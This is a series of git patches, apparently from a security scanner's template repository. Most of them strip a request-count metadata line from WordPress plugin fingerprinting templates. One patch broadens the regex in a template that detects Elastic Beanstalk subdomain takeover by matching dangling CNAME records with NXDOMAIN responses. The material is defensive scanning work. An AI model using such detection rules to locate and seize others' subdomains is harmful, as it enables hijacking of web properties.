--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
-    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 2c7b16cb44..85aaf7ff16 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
-    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 9d6afa8d3f..0af322b728 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index 87721a245a..d4ac0d179e 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
-    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index 45e0dead0e..dbbadf3cfc 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
-    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index abec174ec3..401b0e479f 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
-    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index e088ac07a6..6f95506748 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
-    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 8b163200bf..4404f87aab 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
-    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 2366a7dad7..8995434fce 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
-    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 71448e61e8..8175806cb8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
-    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index 717554b89f..db82bc7f43 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
-    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index fba5c8b09c..03ddae57bc 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
-    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index 631202198e..d6449bb5bf 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
-    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index cc953078eb..2d5fdf1779 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
-    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 97ce674116..6b5705e20d 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
-    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index 6d05a6f058..dbcdb64bad 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index baf5af3bb5..fb9ea502ce 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index aa1898c4ba..48ffb25245 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 5fae796fdd..4fa6fc3ffe 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 22f812e2b8..1c1c690fcd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index c637006d26..4d6702d81a 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index e020507ccb..42cb8bc409 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index c92903fd79..55d6effbf5 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
-    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index c25b2c1c48..6786cab703 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 4d6dd14d25..784ba22c8a 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 7ca0870ed6..72ff55e58a 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
-    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 4f0d9be568..8cfaa0f5a9 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index f3c481b824..85900a01a7 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
-    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index ba214fd7ea..a7ccde0b49 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
-    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 8f5fe8d9a5..422664a98c 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index 0458b13354..f0af3a748a 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
-    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index d570be07bf..f89f1a20b3 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
-    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index ee05e3add8..01fb12d0ad 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
-    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index df2487955f..1773857e15 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
-    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index 79ff01211c..bcd1509c68 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
-    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index 23414b3d1d..c6aca20a60 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index fba45020e4..56dfdf4a59 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 0178c8e9fb..810fc82cde 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
-    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 017cf76f11..2276545093 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
-    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index a04ddc6003..783d381ed8 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
-    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index bc83478f06..27f6d46c2b 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
-    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index dedd2e23b6..ab61cc0338 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
-    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 03cd7137a8..5f6fbc1f75 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index a68d4b7d78..d67150d038 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
-    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index bf9dfc3ad8..beeba7ca69 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index 47911a86a5..c225df7bfd 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index 1c25b6f488..aaad04cb76 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
-    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index b36317acd8..ff750a7d2a 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
-    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index 5eb35dd17e..f1e7595ccd 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
-    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index ceb2b8d600..4b2769ee46 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
-    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From fa97c496c57afc473b9388b48eb8cadf485883fa Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Fri, 22 Sep 2023 16:03:37 +0530
Subject: [PATCH 0480/1090] fixed false negative

---
 dns/elasticbeanstalk-takeover.yaml | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/dns/elasticbeanstalk-takeover.yaml b/dns/elasticbeanstalk-takeover.yaml
index 8eadfcf8bf..60dbebb4cb 100644
--- a/dns/elasticbeanstalk-takeover.yaml
+++ b/dns/elasticbeanstalk-takeover.yaml
@@ -33,14 +33,13 @@ dns:
 
     matchers-condition: and
     matchers:
-
       - type: regex
         regex:
-          - CNAME\t[a-z0-9_-]*\.(us|af|ap|ca|eu|me|sa)\-(east|west|south|northeast|southeast|central)\-[1-9]+\.elasticbeanstalk\.com
+          - CNAME\t.*\.(us|af|ap|ca|eu|me|sa)\-(east|west|south|northeast|southeast|central)\-[1-9]+\.elasticbeanstalk\.com
 
       - type: word
         words:
-          - "NXDOMAIN"
+          - NXDOMAIN
 
     extractors:
       - type: regex

From 56c737b9a390c38cf64434d051d694c360116d88 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Fernando=20Mu=C3=B1oz?= 
Date: Fri, 22 Sep 2023 05:36:24 -0500
